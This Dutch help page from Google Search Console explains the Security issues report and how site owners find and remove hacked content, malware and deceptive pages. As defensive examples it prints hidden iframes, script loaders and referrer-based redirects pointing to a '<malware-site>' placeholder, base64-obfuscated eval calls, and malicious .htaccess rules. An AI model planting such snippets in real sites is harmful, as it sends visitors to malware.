Het rapport 'Beveiligingsproblemen'

Als uit een evaluatie van Google blijkt dat je site is gehackt of gedrag op je site potentieel schadelijk is voor een bezoeker of zijn computer, worden de bevindingen van Google weergegeven in het rapport 'Beveiligingsproblemen'. Voorbeelden van schadelijk gedrag zijn phishingaanvallen of het installeren van malware of ongewenste software op de computer van de gebruiker.

Pagina's of sites met een beveiligingsprobleem kunnen met een waarschuwingslabel worden weergegeven in zoekresultaten. Er kan ook een interstitial waarschuwingspagina worden weergegeven in de browser wanneer een gebruiker de betreffende pagina's of sites probeert te bezoeken.

Het rapport 'Beveiligingsproblemen' openen

 

Wat zijn beveiligingsproblemen?

Beveiligingsproblemen vallen in de volgende categorieën:

  • Gehackte content: Dit is content die als gevolg van kwetsbaarheden in de sitebeveiliging op je site wordt geplaatst zonder dat je hiervoor toestemming hebt gegeven. Omdat we onze gebruikers willen beschermen, probeert Google gehackte content zo veel mogelijk uit de zoekresultaten te weren. Meer informatie
  • Malware en ongewenste software: Dit is software die is ontworpen om een apparaat of de gebruikers daarvan te schaden, die misleidend of onverwacht gedrag vertoont of een negatieve invloed heeft op de gebruiker. Meer informatie
  • Social engineering: Dit is content die bezoekers ertoe probeert te verleiden iets gevaarlijks te doen, zoals vertrouwelijke gegevens verstrekken of software downloaden. Meer informatie

Heb ik beveiligingsproblemen op mijn site?

Als je site beveiligingsproblemen heeft, wordt bovenaan het rapport het aantal beveiligingsproblemen op je site weergegeven.

Als er geen sprake is van beveiligingsproblemen, zie je een groen vinkje en een melding.

Maar ik heb deze site net gekocht

Als je onlangs een site hebt gekocht met reeds bestaande beveiligingsproblemen, verhelp je de problemen die worden vermeld in het rapport 'Beveiligingsproblemen'. Laat ons vervolgens via een verzoek tot heroverweging weten dat je de site onlangs hebt gekocht en dat deze nu voldoet aan de richtlijnen voor webmasters van Google.

Op welke pagina's is het beveiligingsprobleem van toepassing?

Vouw een probleembeschrijving uit om een lijst te bekijken met voorbeelden van URL's waarop het beveiligingsprobleem van toepassing is. Deze lijst is niet noodzakelijkerwijs volledig, maar bevat voorbeelden van pagina's op je site waarop het geselecteerde probleem van toepassing is. Je kunt af en toe een beveiligingsprobleem zonder voorbeeld-URL's hebben. Dit betekent niet dat er geen pagina's met het probleem zijn, maar alleen dat we geen voorbeelden kunnen genereren.

De probleemdetails bevatten de datum waarop het probleem voor het eerst op je site is gedetecteerd, een korte beschrijving en een link voor meer informatie over het probleem.

Het probleem verhelpen

Een beveiligingsprobleem op je site verhelpen:

  1. Vouw de probleembeschrijving in het rapport 'Beveiligingsproblemen' uit.
  2. Lees de beschrijving en klik op de link 'Meer informatie' voor gedetailleerde informatie en stappen om het probleem te verhelpen. (De links voor 'Meer informatie' verwijzen naar de beschrijvingen hieronder op deze pagina.)
  3. Gebruik het voorbeeld van de betreffende pagina's in het gedeelte met details om het probleem te identificeren en te verhelpen. Deze lijst is niet noodzakelijkerwijs volledig, maar bevat voorbeelden van pagina's op je site waarop dit probleem van toepassing is. Je kunt een beveiligingsprobleem zonder voorbeeld-URL's hebben. Dit betekent niet dat er geen pagina's met het probleem zijn, maar alleen dat we geen voorbeelden kunnen genereren.
  4. Verhelp het probleem op je hele site. Als je het probleem op slechts enkele pagina's verhelpt, wordt je site niet gedeeltelijk weergegeven in de zoekresultaten.
  5. Als in het rapport meerdere beveiligingsproblemen voor je site worden vermeld, verhelp je ze allemaal.
  6. Test je oplossingen.
  7. Wanneer alle problemen in het rapport zijn verholpen op alle pagina's, selecteer je Beoordeling aanvragen in het rapport 'Beveiligingsproblemen'. Vermeld je oplossingen in het verzoek tot heroverweging. Een goed verzoek heeft de volgende kenmerken:
    • Het beschrijft het exacte kwaliteitsprobleem op je site.
    • Het beschrijft de stappen die je hebt genomen om het probleem te verhelpen.
    • Het documenteert het resultaat van je inspanningen.
  8. Beoordelingen voor heroverweging kunnen een week of twee in beslag nemen. Je wordt via e-mail op de hoogte gehouden van de voortgang. Je ontvangt een bevestigingsbericht wanneer je je verzoek hebt verzonden om je te laten weten dat het beoordelingsproces is gestart. Verzend je verzoek niet opnieuw voordat je een definitief besluit voor het openstaande verzoek hebt ontvangen.

Hoeveel tijd neemt de beoordeling voor heroverweging in beslag?

Dit kan een week of twee in beslag nemen. Nadat we je verzoek hebben ontvangen, krijg je van ons een e-mail zodat je weet dat het beoordelingsproces actief is. Je ontvangt ook een e-mail wanneer de beoordeling is afgerond.

Verzend je verzoek niet opnieuw voordat je een beslissing voor openstaande verzoeken hebt ontvangen. Als je een verzoek tot heroverweging indient wanneer het probleem niet is verholpen, kan dit leiden tot een langere omlooptijd voor het volgende verzoek of er zelfs voor zorgen dat je wordt aangeduid als recidivist.

Lijst met beveiligingsproblemen

Hier volgt een lijst met mogelijke beveiligingsproblemen en informatie over hoe je elk probleem kunt verhelpen.

Misleidende pagina's

Je site bevat content die bezoekers ertoe probeert te verleiden iets gevaarlijks te doen, zoals vertrouwelijke gegevens verstrekken of software downloaden. Google Safe Browsing beschermt internetgebruikers door ze te waarschuwen voordat ze pagina's bezoeken die constant misleidende content weergeven.

In de volgende gevallen worden webpagina's als misleidend beschouwd:

  • Wanneer ze zich voordoen als of eruitzien als een vertrouwde entiteit, zoals je eigen apparaat of browser of de website zelf.
  • Wanneer ze je proberen te verleiden om iets te doen wat je normaal gesproken alleen doet voor een vertrouwde entiteit, zoals een wachtwoord delen, technische support bellen of software downloaden.

Dit type misleidende content wordt social engineering genoemd. Lees meer informatie over social engineering of bekijk voorbeelden van misleidende pagina's.

Het probleem verhelpen

1. Bevestig het probleem

Ga naar de voorbeeldpagina's om de misleidende content te zoeken. Met de URL-inspectietool kun je de mobiele en desktopweergave van je site bekijken.

2. Verhelp de problemen op je pagina's

Corrigeer alle pagina's die zich bezighouden met social engineering. Als je van mening bent dat Safe Browsing een webpagina ten onrechte heeft geclassificeerd, kun je dat hier melden.

3. Vraag een beoordeling aan

Wanneer je hebt bevestigd dat het probleem op je site is verholpen, vraag je een beveiligingscontrole aan via het rapport 'Beveiligingsproblemen'. Een controle kan enkele dagen tot enkele weken in beslag nemen.

Misleidende ingesloten bronnen

Je site bevat misleidende advertenties of ingesloten bronnen die bezoekers ertoe proberen te verleiden iets gevaarlijks te doen, zoals vertrouwelijke gegevens verstrekken of ongewenste software downloaden. Misleidende content kan worden opgenomen via bronnen die zijn ingesloten in de pagina, andere componenten van derden of advertenties. Google Safe Browsing beschermt internetgebruikers door ze te waarschuwen voordat ze pagina's bezoeken die constant misleidende content weergeven.

Soms is deze content zichtbaar voor gebruikers op de hostpagina. In andere gevallen bevat de hostpagina geen zichtbare advertenties, maar worden gebruikers via pop-ups, pop-unders of andere omleidingen naar schadelijke pagina's gebracht. In alle gevallen leidt dit type ingesloten content tot een beleidsschending voor de hostpagina.

Dit type misleidende content wordt social engineering genoemd. Lees meer informatie over social engineering of bekijk voorbeelden van misleidende ingesloten bronnen.

Het probleem verhelpen

1. Bevestig het probleem

Ga naar de voorbeeldpagina's om de misleidende content te zoeken. Zorg ervoor dat advertenties, afbeeldingen of andere ingesloten bronnen van derden op de pagina's van je site niet misleidend zijn. Houd er rekening mee dat advertentienetwerken de advertenties die op de pagina's van je site worden weergegeven, kunnen rouleren. Je moet een pagina daarom mogelijk enkele keren vernieuwen voordat social-engineeringadvertenties worden weergegeven. Bepaalde advertenties kunnen er verschillend uitzien op mobiele apparaten en desktopcomputers. Met de URL-inspectietool kun je de mobiele en desktopweergave van je site bekijken.

2. Verwijder de misleidende advertenties of bronnen

Controleer de bronnen van derden die zijn opgenomen op je site. Zorg ervoor dat advertenties, afbeeldingen of andere ingesloten bronnen van derden op de pagina's van je site niet misleidend zijn. Corrigeer alle pagina's die zich bezighouden met social engineering

3. Vraag een beoordeling aan

Wanneer je hebt bevestigd dat het probleem op je site is verholpen, vraag je een beveiligingscontrole aan via het rapport 'Beveiligingsproblemen'. Een controle kan enkele dagen tot enkele weken in beslag nemen.

Malware
Je site is geïnfecteerd met (of host) malware van een kwaadwillende hacker. Malware is software of een mobiele app die speciaal bedoeld is om een computer, een mobiel apparaat, de software daarop of de gebruikers daarvan te schaden.

1. Bepaal of je dit kunt verhelpen

Als je een malwareprobleem op je site wilt verhelpen, moet je de code voor je site kunnen lezen en begrijpen en mogelijk ook weten hoe webserverconfiguraties werken. Als je dit te moeilijk vindt, bekijk je het artikel Een ondersteuningsteam samenstellen voor meer informatie over hoe je hulp kunt krijgen.

2. Voer een diagnose uit en verhelp het malwareprobleem

Er zijn veel typen malware. Lees de volgende gedeelten om het specifieke type malware vast te stellen en te verhelpen. Houd er rekening mee dat je site kan zijn geïnfecteerd met meerdere typen malware. Ga grondig te werk bij het vaststellen van de malware en het opschonen van je site.

Type malware: Serverconfiguratie

Beschrijving

Een hacker heeft je site gehackt en leidt bezoekers om van je goede site naar zijn aanvalssite met malware. Hiervoor heeft de hacker waarschijnlijk de configuratiebestanden van je server aangepast. In de configuratiebestanden van de server kan de beheerder de URL's specificeren waarnaar pagina's of directory's op een website omleiden. Op Apache-servers zijn dit bijvoorbeeld het .htaccess-bestand en httpd.conf.

Het probleem verhelpen

1. Bevestig het probleem

Ga naar enkele van de voorbeeld-URL's die worden weergegeven in het rapport 'Beveiligingsproblemen'.

Gebruik geen browser om geïnfecteerde pagina's op je site rechtstreeks te bekijken.

Omdat malware zich vaak verspreidt door misbruik te maken van kwetsbaarheden van de browser, kun je je computer beschadigen door een geïnfecteerde malwarepagina in een browser te openen. Ook kunnen hackers de content met spam verbergen via cloaking-technieken om detectie door site-eigenaren te voorkomen.

Hier zijn twee alternatieve methoden om content veiliger te bekijken op je computer:

  • Gebruik de URL-inspectietool om je pagina te bekijken zoals Google deze ziet. Dit is handig omdat veel hackers wijzigingen aanbrengen die alleen zichtbaar zijn voor Google-computers. Ze kunnen bijvoorbeeld links vanaf jouw site naar hun site toevoegen die alleen worden weergegeven wanneer Google de verwijzer is.
  • Gebruik cURL of Wget om HTTP-verzoeken (bijvoorbeeld om een pagina op te halen) uit te voeren via de opdrachtregel. Deze gratis beschikbare tools zijn nuttig bij de diagnose van omleidingen en kunnen tevens informatie verstrekken over de verwijzer of user-agent. Hackers vallen vaak alleen specifieke user-agents of verwijzers aan om detectie te voorkomen en betere doelen te selecteren. Als je deze tools gebruikt, kun je een doel nabootsen. Probeer verschillende verwijzende adressen (zoals links vanaf grote websites of verschillende zoekmachines) als je verzoek het spamgedrag niet oproept. Als je bijvoorbeeld een gebruiker wilt nabootsen die op een Windows-computer een link vanuit zoekresultaten van Google volgt naar www.example.com/page.html, gebruik je een cURL zoals deze:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Een reactie van een pagina die is geïnfecteerd met een malware-infectie van het type 'Serverconfiguratie' kan de volgende headers bevatten:

...
< HTTP/1.1 301 Moved Permanently
< Date: Sun, 24 Feb 2013 21:06:45 GMT
< Server: Apache
< Location: http://<malware-attack-site>/index.html
< Content-Length: 253
...

2. Verwijder de malware van het type 'Serverconfiguratie' van je site

Log in bij je server via shell/terminal-toegang (je kunt de site desgewenst offline zetten) en controleer de betreffende serverconfiguratiebestanden. Er kunnen meerdere gehackte serverconfiguratiebestanden op je site zijn. Controleer deze bestanden op ongewenste instructies, waarmee de hacker je site configureert om gebruikers om te leiden naar onbekende aanvalssites met malware. In het .htaccess-bestand kun je bijvoorbeeld een omleiding zoals deze zien:

RewriteEngine On 
RewriteCond %{HTTP_REFERER} .*google.* 
RewriteRule ^third-page.html($|/) http://<malware-site>/index.html [R=301]

 

Aanvullende punten:

  • Controleer het hele bestand voor het geval de hacker zijn code aan het einde van het bestand heeft toegevoegd, waar deze gemakkelijker over het hoofd kan worden gezien.
  • Onderzoek potentiële cron jobs die zijn gemaakt door de hacker en die zijn bedoeld om het .htaccess-bestand voortdurend te updaten. Cron jobs kunnen worden vermeld op verschillende locaties, waaronder /etc/crontab (ook meerdere /etc/cron*-mappen) en /var/spool/cron.
  • Lees de gids voor gehackte sites voor een volledig oplossingsproces voor je site, waaronder stappen voor opschonen en tips om te voorkomen dat je site weer wordt gehackt.
Type malware: SQL-invoeging

Beschrijving

Een hacker heeft waarschijnlijk de database van je site gehackt. Het is bijvoorbeeld mogelijk dat de hacker via een programma schadelijke code aan elke record van een databasetabel heeft toegevoegd, zodat wanneer de server een pagina laadt die informatie uit de database nodig heeft, de schadelijke code wordt ingesloten in de content van de pagina. Dit kan schadelijk zijn voor bezoekers van de site.

Het probleem verhelpen

1. Bevestig het probleem

Voer een aantal query's voor de betreffende URL's uit via de opdrachtregel en controleer de reactie op woorden die duiden op een SQL-aanval, zoals 'iframe' of 'eval'.

Gebruik geen browser om geïnfecteerde pagina's op je site rechtstreeks te bekijken.

Omdat malware zich vaak verspreidt door misbruik te maken van kwetsbaarheden van de browser, kun je je computer beschadigen door een geïnfecteerde malwarepagina in een browser te openen. Ook kunnen hackers de content met spam verbergen via cloaking-technieken om detectie door site-eigenaren te voorkomen.

Hier zijn twee alternatieve methoden om content veiliger te bekijken op je computer:

  • Gebruik de URL-inspectietool om je pagina te bekijken zoals Google deze ziet. Dit is handig omdat veel hackers wijzigingen aanbrengen die alleen zichtbaar zijn voor Google-computers. Ze kunnen bijvoorbeeld links vanaf jouw site naar hun site toevoegen die alleen worden weergegeven wanneer Google de verwijzer is.
  • Gebruik cURL of Wget om HTTP-verzoeken (bijvoorbeeld om een pagina op te halen) uit te voeren via de opdrachtregel. Deze gratis beschikbare tools zijn nuttig bij de diagnose van omleidingen en kunnen tevens informatie verstrekken over de verwijzer of user-agent. Hackers vallen vaak alleen specifieke user-agents of verwijzers aan om detectie te voorkomen en betere doelen te selecteren. Als je deze tools gebruikt, kun je een doel nabootsen. Probeer verschillende verwijzende adressen (zoals links vanaf grote websites of verschillende zoekmachines) als je verzoek het spamgedrag niet oproept. Als je bijvoorbeeld een gebruiker wilt nabootsen die op een Windows-computer een link vanuit zoekresultaten van Google volgt naar www.example.com/page.html, gebruik je een cURL zoals deze:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Log vervolgens in bij je databaseserver of bekijk je database via een tool zoals phpMyAdmin. Als je Wget of cURL hebt gebruikt, probeer je de vastgestelde schade in de broncode van de pagina via Wget of cURL in verband te brengen met de daadwerkelijke databaserecords. Als je bijvoorbeeld hebt vastgesteld dat je pagina's een gevaarlijke iframe bevatten, kun je een SQL-query uitvoeren om iframe-code te zoeken. Bijvoorbeeld:

SELECT * FROM blog_posts WHERE post_text LIKE '%>iframe%'; 

Je kunt ook het databaselogboek en de foutbestanden op je server controleren op ongebruikelijke activiteit, zoals onverwachte SQL-opdrachten die abnormaal lijken voor gewone gebruikers of fouten.

2. Schoon je site op

Wanneer je klaar bent om je site op te schonen, kun je elke geïnfecteerde databaserecord updaten of kun je de laatste goede back-up van de database terugzetten.

Aanvullende punten:

  • Lees de gids voor gehackte sites voor een volledig oplossingsproces voor je site, waaronder stappen voor opschonen en tips om te voorkomen dat je site weer wordt gehackt.
Type malware: Invoeging van code

Beschrijving

Pagina's op je site zijn aangepast om schadelijke code op te nemen, zoals een iframe naar een aanvalssite met malware.

Het probleem verhelpen

1. Bevestig het probleem

Ga naar de URL's waarvoor in het rapport 'Beveiligingsproblemen' wordt aangegeven dat ze geïnfecteerd zijn. Controleer de html van de reacties op schadelijke code.

Gebruik geen browser om geïnfecteerde pagina's op je site rechtstreeks te bekijken.

Omdat malware zich vaak verspreidt door misbruik te maken van kwetsbaarheden van de browser, kun je je computer beschadigen door een geïnfecteerde malwarepagina in een browser te openen. Ook kunnen hackers de content met spam verbergen via cloaking-technieken om detectie door site-eigenaren te voorkomen.

Hier zijn twee alternatieve methoden om content veiliger te bekijken op je computer:

  • Gebruik de URL-inspectietool om je pagina te bekijken zoals Google deze ziet. Dit is handig omdat veel hackers wijzigingen aanbrengen die alleen zichtbaar zijn voor Google-computers. Ze kunnen bijvoorbeeld links vanaf jouw site naar hun site toevoegen die alleen worden weergegeven wanneer Google de verwijzer is.
  • Gebruik cURL of Wget om HTTP-verzoeken (bijvoorbeeld om een pagina op te halen) uit te voeren via de opdrachtregel. Deze gratis beschikbare tools zijn nuttig bij de diagnose van omleidingen en kunnen tevens informatie verstrekken over de verwijzer of user-agent. Hackers vallen vaak alleen specifieke user-agents of verwijzers aan om detectie te voorkomen en betere doelen te selecteren. Als je deze tools gebruikt, kun je een doel nabootsen. Probeer verschillende verwijzende adressen (zoals links vanaf grote websites of verschillende zoekmachines) als je verzoek het spamgedrag niet oproept. Als je bijvoorbeeld een gebruiker wilt nabootsen die op een Windows-computer een link vanuit zoekresultaten van Google volgt naar www.example.com/page.html, gebruik je een cURL zoals deze:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Hier volgen enkele voorbeelden van schadelijke code:

  • iframe waarmee een schadelijke site wordt geladen:
    <iframe frameborder="0" height="0" src="http://<malware-site>/path/file" 
      style="display:none" width="0"></iframe>
  • JavaScript of een andere scripttaal die scripts van een aanvalssite aanroept en uitvoert:
    <script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
  • Scripts die de browser omleiden naar een aanvalssite:
    <script>
      if (document.referrer.match(/google\.com/)) {
        window.location("http://<malware-site>/");
      }
    </script>
  • Schadelijke code die is verborgen om detectie te voorkomen:
    eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
  • Gedeelde objectbestanden die zijn bedoeld om op willekeurige wijze schadelijke code te schrijven naar scripts die verder goedaardig zijn:
    #httpd.conf modified by the hacker
    LoadModule harmful_module modules/mod_harmful.so
    AddModule mod_harmful.c

Onderzoek alle mogelijke schadelijke code die aanwezig is op de site. Je kunt bijvoorbeeld zoeken naar woorden als 'iframe' om iframe-code te vinden. Andere handige zoekwoorden zijn 'script', 'eval' en 'unescape'. Je kunt bijvoorbeeld als volgt in alle bestanden op Unix-systemen zoeken naar 'iframe':

$grep -irn "iframe" ./ | less

2. Schoon je site op

Wanneer je klaar bent om je site op te schonen, kun je de betreffende bestanden vervangen door de laatste goede back-up of kun je de ingevoegde code verwijderen van elke pagina en uit alle gerelateerde scriptfuncties of -bestanden. Als je serverconfiguratiebestanden hebt gewijzigd, kan het zijn dat je je webserver opnieuw moet opstarten om de wijzigingen door te voeren.

Aanvullende punten:

  • Lees de gids voor gehackte sites voor een volledig oplossingsproces voor je site, waaronder stappen voor opschonen en tips om te voorkomen dat je site weer wordt gehackt.
Type malware: Fouttemplate

Beschrijving

De template die wordt gebruikt voor foutmeldingen (zoals '404 Bestand niet gevonden') is geconfigureerd om malware te verspreiden. Zo kunnen hackers aanvallen uitvoeren vanaf URL's die niet eens bestaan op je site.

Het probleem verhelpen

1. Bevestig het probleem

Vraag een pagina op je site aan die niet bestaat of die een ander type fout retourneert en controleer de reactie om na te gaan of deze afkomstig is van een andere site of anderszins malware bevat.

Gebruik geen browser om geïnfecteerde pagina's op je site rechtstreeks te bekijken.

Omdat malware zich vaak verspreidt door misbruik te maken van kwetsbaarheden van de browser, kun je je computer beschadigen door een geïnfecteerde malwarepagina in een browser te openen. Ook kunnen hackers de content met spam verbergen via cloaking-technieken om detectie door site-eigenaren te voorkomen.

Hier zijn twee alternatieve methoden om content veiliger te bekijken op je computer:

  • Gebruik de URL-inspectietool om je pagina te bekijken zoals Google deze ziet. Dit is handig omdat veel hackers wijzigingen aanbrengen die alleen zichtbaar zijn voor Google-computers. Ze kunnen bijvoorbeeld links vanaf jouw site naar hun site toevoegen die alleen worden weergegeven wanneer Google de verwijzer is.
  • Gebruik cURL of Wget om HTTP-verzoeken (bijvoorbeeld om een pagina op te halen) uit te voeren via de opdrachtregel. Deze gratis beschikbare tools zijn nuttig bij de diagnose van omleidingen en kunnen tevens informatie verstrekken over de verwijzer of user-agent. Hackers vallen vaak alleen specifieke user-agents of verwijzers aan om detectie te voorkomen en betere doelen te selecteren. Als je deze tools gebruikt, kun je een doel nabootsen. Probeer verschillende verwijzende adressen (zoals links vanaf grote websites of verschillende zoekmachines) als je verzoek het spamgedrag niet oproept. Als je bijvoorbeeld een gebruiker wilt nabootsen die op een Windows-computer een link vanuit zoekresultaten van Google volgt naar www.example.com/page.html, gebruik je een cURL zoals deze:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

2. Schoon je site op

Log in bij je webserver en zoek in je serverconfiguratiebestanden naar instructies voor foutpagina's. Zo kan de fouttemplate voor Apache-webservers worden gedeclareerd in het .htaccess-bestand. Hier volgt een voorbeeld van een .htaccess-bestandsvermelding die 404-foutpagina's ophaalt van een schadelijke site:

ErrorDocument 404 http://<malware-site>/index.html 

Wanneer je klaar bent om je site op te schonen, kun je de .htaccess-bestanden vervangen door een goede back-up of kun je de ongewenste ErrorDocument-instructies verwijderen uit de bestaande .htaccess-bestanden. Schoon ook de daadwerkelijke foutbestanden op als deze bestaan op je site. Start ten slotte je webserver opnieuw op om alle wijzigingen door te voeren.

Aanvullende punten:

  • Lees de gids voor gehackte sites voor een volledig oplossingsproces voor je site, waaronder stappen voor opschonen en tips om te voorkomen dat je site weer wordt gehackt.
Type malware: Cross-site malware

Beschrijving

De site laadt content van een website waarvan bekend is dat deze schadelijke content bevat. In Chrome wordt dit aangegeven met een browser-interstitial met de volgende afbeelding:

cross-site malware warning

Het probleem verhelpen

  1. Bevestig het probleem door enkele van de voorbeeld-URL's in het rapport 'Beveiligingsproblemen' te bezoeken. De bovenstaande afbeelding zou moeten worden weergegeven als dit een probleem met cross-site malware is.
  2. De browserwaarschuwing geeft het domein van de twijfelachtige content aan. Verwijder alle verwijzingen naar de gemarkeerde site die wordt vermeld in de browserwaarschuwing.
  3. Als je vaststelt dat een pagina op je site zonder jouw medeweten content van een gemarkeerde site opneemt, is het probleem ernstiger en is je site waarschijnlijk gehackt. In beide gevallen raadt Google aan om het herstelprotocol Hulp bij gehackte sites te volgen en je site in quarantaine te plaatsen, de schade te beoordelen en je site op te schonen.
  4. Nadat je alle content met betrekking tot social engineering hebt verwijderd van je site, vraag je een beveiligingscontrole aan via het rapport 'Beveiligingsproblemen'. Een controle kan enkele dagen tot enkele weken in beslag nemen.
  5. Als je bewust content van een legitieme site hebt opgenomen die nu is gemarkeerd en je de content opnieuw wilt opnemen nadat de site is opgeschoond, kun je de status van de gemarkeerde site controleren via de diagnostische pagina van Google Safe Browsing voor die site (http://www.google.com/safebrowsing/diagnostic?site=www.example.com). Legitieme sites worden vaak snel opgeschoond door hun eigenaren.
Andere typen malware

Er zijn veel andere typen malware die van invloed kunnen zijn op je site. Ga naar de site van Web Fundamentals voor meer tips om andere hackingtypen vast te stellen en te verhelpen. Nadat je je site hebt gecorrigeerd, moet je een beoordeling aanvragen.

3. Vraag een beoordeling aan

Wanneer je hebt bevestigd dat het probleem op je site is verholpen, vraag je een beveiligingscontrole aan via het rapport 'Beveiligingsproblemen'. Een controle kan enkele dagen tot enkele weken in beslag nemen.

Type hackingactie: Invoeging van code

Een hacker heeft je site gehackt en voegt schadelijke code in op je pagina's. Voorbeelden hiervan zijn omleidingen naar een schadelijke site of het uitvoeren van software voor cryptocurrency-mining in je browser terwijl de pagina is geopend.

1. Bepaal of je dit kunt verhelpen

Bekijk het artikel Een ondersteuningsteam samenstellen om een idee te krijgen van hoe je dit zelf kunt verhelpen of voor meer informatie over hoe je hulp kunt vinden als je dit niet zelf kunt doen.

2. Bevestig het probleem

Gebruik geen browser om geïnfecteerde pagina's op je site rechtstreeks te bekijken.

Omdat malware zich vaak verspreidt door misbruik te maken van kwetsbaarheden van de browser, kun je je computer beschadigen door een geïnfecteerde malwarepagina in een browser te openen. Ook kunnen hackers de content met spam verbergen via cloaking-technieken om detectie door site-eigenaren te voorkomen.

Hier zijn twee alternatieve methoden om content veiliger te bekijken op je computer:

  • Gebruik de URL-inspectietool om je pagina te bekijken zoals Google deze ziet. Dit is handig omdat veel hackers wijzigingen aanbrengen die alleen zichtbaar zijn voor Google-computers. Ze kunnen bijvoorbeeld links vanaf jouw site naar hun site toevoegen die alleen worden weergegeven wanneer Google de verwijzer is.
  • Gebruik cURL of Wget om HTTP-verzoeken (bijvoorbeeld om een pagina op te halen) uit te voeren via de opdrachtregel. Deze gratis beschikbare tools zijn nuttig bij de diagnose van omleidingen en kunnen tevens informatie verstrekken over de verwijzer of user-agent. Hackers vallen vaak alleen specifieke user-agents of verwijzers aan om detectie te voorkomen en betere doelen te selecteren. Als je deze tools gebruikt, kun je een doel nabootsen. Probeer verschillende verwijzende adressen (zoals links vanaf grote websites of verschillende zoekmachines) als je verzoek het spamgedrag niet oproept. Als je bijvoorbeeld een gebruiker wilt nabootsen die op een Windows-computer een link vanuit zoekresultaten van Google volgt naar www.example.com/page.html, gebruik je een cURL zoals deze:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

De hacker kan de schadelijke code rechtstreeks hebben ingevoegd in de html-bestanden van je site (bijvoorbeeld door een JavaScript-omleiding toe te voegen) of in bestanden die de content van je site genereren (bijvoorbeeld PHP-bestanden).

Haal een gehackte pagina op die wordt vermeld in het rapport en controleer de reactie. Hackers kunnen verschillende technieken gebruiken om bezoekers van je site om te leiden naar hun site. Hier volgen er een paar:

  • Omleiding:
    • Headeromleidingen: Hackers kunnen bezoekers omleiden door de configuratiebestanden van je server aan te passen. In de configuratiebestanden van de server kan de beheerder de URL's specificeren waarnaar pagina's of directory's op een website omleiden. Op Apache-servers zijn dit bijvoorbeeld het .htaccess-bestand en httpd.conf.
      ...
      < HTTP/1.1 301 Moved Permanently
      < Date: Sun, 24 Feb 2013 21:06:45 GMT
      < Server: Apache
      < Location: http://<malware-site>/index.html
      < Content-Length: 253
    • JavaScript-omleidingen:
      <script>
        if (document.referrer.match(/google\.com/)) {
          window.location("http://<malware-site>/");}
      <script>
  • Schadelijke JavaScript-code geladen via een andere site:
    <script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
  • Schadelijke code die is verborgen om detectie te voorkomen:
    eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));

Zoek naar verdachte code in je reacties en op je site. Handige zoektermen zijn 'search', 'eval', 'base64_decode' en 'unescape'.

3. Schoon je site op

Wanneer je klaar bent om je site op te schonen, kun je de betreffende bestanden vervangen door de laatste goede back-up of kun je de content met spam verwijderen.

Aanvullende punten:

  • Lees de gids voor gehackte sites voor een volledig oplossingsproces voor je site, waaronder stappen voor opschonen en tips om te voorkomen dat je site weer wordt gehackt.

4. Vraag een beoordeling aan

Wanneer je hebt bevestigd dat het probleem op je site is verholpen, vraag je een beveiligingscontrole aan via het rapport 'Beveiligingsproblemen'. Een controle kan enkele dagen tot enkele weken in beslag nemen.

Type hackingactie: Invoeging van content

Een hacker heeft links of tekst met spam aan de pagina's van je site toegevoegd. De ingevoegde content kan farmaceutische termen of andere spam bevatten die niets met de content van de site te maken heeft.

Hackers proberen je site meestal op een van de volgende manieren te wijzigen:

  • Door het verkrijgen van toegang tot een onveilige directory op je server. Je kunt bijvoorbeeld per ongeluk open toegangsrechten hebben verleend aan een directory.
  • Door misbruik te maken van een zwakke plek in de software op je site, zoals een contentmanagementsysteem. Je gebruikt bijvoorbeeld een verouderde, onveilige versie van Drupal, Joomla! of WordPress.
  • Door het hacken van plug-ins van derden die je gebruikt op je site, zoals bezoekerstellers.

1. Bepaal of je dit kunt verhelpen

Bekijk het artikel Een ondersteuningsteam samenstellen om een idee te krijgen van hoe je dit zelf kunt verhelpen of voor meer informatie over hoe je hulp kunt vinden als je dit niet zelf kunt doen.

2. Bevestig het probleem

Gebruik geen browser om geïnfecteerde pagina's op je site rechtstreeks te bekijken.

Omdat malware zich vaak verspreidt door misbruik te maken van kwetsbaarheden van de browser, kun je je computer beschadigen door een geïnfecteerde malwarepagina in een browser te openen. Ook kunnen hackers de content met spam verbergen via cloaking-technieken om detectie door site-eigenaren te voorkomen.

Hier zijn twee alternatieve methoden om content veiliger te bekijken op je computer:

  • Gebruik de URL-inspectietool om je pagina te bekijken zoals Google deze ziet. Dit is handig omdat veel hackers wijzigingen aanbrengen die alleen zichtbaar zijn voor Google-computers. Ze kunnen bijvoorbeeld links vanaf jouw site naar hun site toevoegen die alleen worden weergegeven wanneer Google de verwijzer is.
  • Gebruik cURL of Wget om HTTP-verzoeken (bijvoorbeeld om een pagina op te halen) uit te voeren via de opdrachtregel. Deze gratis beschikbare tools zijn nuttig bij de diagnose van omleidingen en kunnen tevens informatie verstrekken over de verwijzer of user-agent. Hackers vallen vaak alleen specifieke user-agents of verwijzers aan om detectie te voorkomen en betere doelen te selecteren. Als je deze tools gebruikt, kun je een doel nabootsen. Probeer verschillende verwijzende adressen (zoals links vanaf grote websites of verschillende zoekmachines) als je verzoek het spamgedrag niet oproept. Als je bijvoorbeeld een gebruiker wilt nabootsen die op een Windows-computer een link vanuit zoekresultaten van Google volgt naar www.example.com/page.html, gebruik je een cURL zoals deze:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Haal enkele pagina's van je site op en zoek in de reacties naar verdachte content of links die je niet hebt toegevoegd. Zoek bijvoorbeeld naar farmaceutische termen of spamtermen, zoals 'viagra' of 'verdien geld'.

